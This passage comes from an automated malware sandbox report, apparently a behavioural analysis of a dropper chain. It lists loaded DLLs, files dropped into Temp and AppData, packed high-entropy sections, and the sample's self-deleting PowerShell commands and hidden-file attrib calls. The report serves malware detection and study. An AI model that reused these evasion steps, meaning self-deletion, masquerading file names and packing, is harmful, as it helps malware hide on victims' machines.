                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\random.exe_Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: random.exe_Y.exeStatic file information: File size 2985472 > 1048576
                            Source: random.exe_Y.exeStatic PE information: Raw size of xswvdtxt is bigger than: 0x100000 < 0x2a7200
                            Source: Binary string: wkernel32.pdb source: d7691cd336.exe, 00000024.00000003.2816311933.0000000005010000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816191729.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821430291.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821309340.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernelbase.pdb source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdb source: d7691cd336.exe, 00000024.00000003.2814530012.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2814843608.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819961783.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819182827.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: d7691cd336.exe, 00000024.00000003.2815576997.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2815815140.0000000005090000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2820660089.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdbUGP source: d7691cd336.exe, 00000024.00000003.2814530012.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2814843608.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819961783.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2819182827.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: d7691cd336.exe, 00000024.00000003.2815576997.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2815815140.0000000005090000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2820660089.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernelbase.pdbUGP source: d7691cd336.exe, 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wkernel32.pdbUGP source: d7691cd336.exe, 00000024.00000003.2816311933.0000000005010000.00000004.00000001.00020000.00000000.sdmp, d7691cd336.exe, 00000024.00000003.2816191729.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821430291.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000003.2821309340.00000000050E0000.00000004.00000001.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: C:\Users\user\Desktop\random.exe_Y.exeUnpacked PE file: 0.2.random.exe_Y.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xswvdtxt:EW;wvmigpas:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeUnpacked PE file: 36.2.d7691cd336.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ocizazuj:EW;tmlfxogw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ocizazuj:EW;tmlfxogw:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,8_2_00402665
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                            Source: random.exe_Y.exeStatic PE information: real checksum: 0x2e6b0c should be: 0x2d98b5
                            Source: random[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                            Source: f1e68d5060.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                            Source: 7z.exe.8.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                            Source: random[1].exe2.6.drStatic PE information: real checksum: 0x1e027c should be: 0x1e3c66
                            Source: 7z.dll.8.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                            Source: Intel_PTT_EK_Recertification.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                            Source: in.exe.19.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                            Source: 5b3f6dd868.exe.6.drStatic PE information: real checksum: 0x44cee5 should be: 0x446c4d
                            Source: d7691cd336.exe.6.drStatic PE information: real checksum: 0x1e027c should be: 0x1e3c66
                            Source: c5bc1413d7.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                            Source: skotes.exe.0.drStatic PE information: real checksum: 0x2e6b0c should be: 0x2d98b5
                            Source: random[1].exe0.6.drStatic PE information: real checksum: 0x44cee5 should be: 0x446c4d
                            Source: random[2].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                            Source: random.exe_Y.exeStatic PE information: section name:
                            Source: random.exe_Y.exeStatic PE information: section name: .idata
                            Source: random.exe_Y.exeStatic PE information: section name: xswvdtxt
                            Source: random.exe_Y.exeStatic PE information: section name: wvmigpas
                            Source: random.exe_Y.exeStatic PE information: section name: .taggant
                            Source: skotes.exe.0.drStatic PE information: section name:
                            Source: skotes.exe.0.drStatic PE information: section name: .idata
                            Source: skotes.exe.0.drStatic PE information: section name: xswvdtxt
                            Source: skotes.exe.0.drStatic PE information: section name: wvmigpas
                            Source: skotes.exe.0.drStatic PE information: section name: .taggant
                            Source: random[1].exe0.6.drStatic PE information: section name:
                            Source: random[1].exe0.6.drStatic PE information: section name: .idata
                            Source: random[1].exe0.6.drStatic PE information: section name:
                            Source: random[1].exe0.6.drStatic PE information: section name: ahvfevpi
                            Source: random[1].exe0.6.drStatic PE information: section name: qgsnhtie
                            Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name:
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: .idata
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name:
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: ahvfevpi
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: qgsnhtie
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: .taggant
                            Source: random[1].exe2.6.drStatic PE information: section name:
                            Source: random[1].exe2.6.drStatic PE information: section name: .idata
                            Source: random[1].exe2.6.drStatic PE information: section name:
                            Source: random[1].exe2.6.drStatic PE information: section name: ocizazuj
                            Source: random[1].exe2.6.drStatic PE information: section name: tmlfxogw
                            Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                            Source: d7691cd336.exe.6.drStatic PE information: section name:
                            Source: d7691cd336.exe.6.drStatic PE information: section name: .idata
                            Source: d7691cd336.exe.6.drStatic PE information: section name:
                            Source: d7691cd336.exe.6.drStatic PE information: section name: ocizazuj
                            Source: d7691cd336.exe.6.drStatic PE information: section name: tmlfxogw
                            Source: d7691cd336.exe.6.drStatic PE information: section name: .taggant
                            Source: in.exe.19.drStatic PE information: section name: UPX2
                            Source: Intel_PTT_EK_Recertification.exe.21.drStatic PE information: section name: UPX2
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000BD91C push ecx; ret 0_2_000BD92F
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_000B1359 push es; ret 0_2_000B135A
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B9D91C push ecx; ret 2_2_00B9D92F
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B8BF38 push esi; iretd 2_2_00B8BF39
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00B9D91C push ecx; ret 3_2_00B9D92F
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00B8BF38 push esi; iretd 3_2_00B8BF39
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9D91C push ecx; ret 6_2_00B9D92F
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9DFC6 push ecx; ret 6_2_00B9DFD9
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004192C0 push eax; ret 8_2_004192EE
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_007B676A push rcx; ret 12_2_007B676B
                            Source: random.exe_Y.exeStatic PE information: section name: entropy: 7.984148545598198
                            Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.984148545598198
                            Source: random[1].exe0.6.drStatic PE information: section name: ahvfevpi entropy: 7.955642008152278
                            Source: 5b3f6dd868.exe.6.drStatic PE information: section name: ahvfevpi entropy: 7.955642008152278
                            Source: random[1].exe2.6.drStatic PE information: section name: entropy: 7.9669881506806774
                            Source: random[1].exe2.6.drStatic PE information: section name: ocizazuj entropy: 7.952982363060682
                            Source: d7691cd336.exe.6.drStatic PE information: section name: entropy: 7.9669881506806774
                            Source: d7691cd336.exe.6.drStatic PE information: section name: ocizazuj entropy: 7.952982363060682
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1
                            Source: initial sampleStatic PE information: section name: UPX0
                            Source: initial sampleStatic PE information: section name: UPX1

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
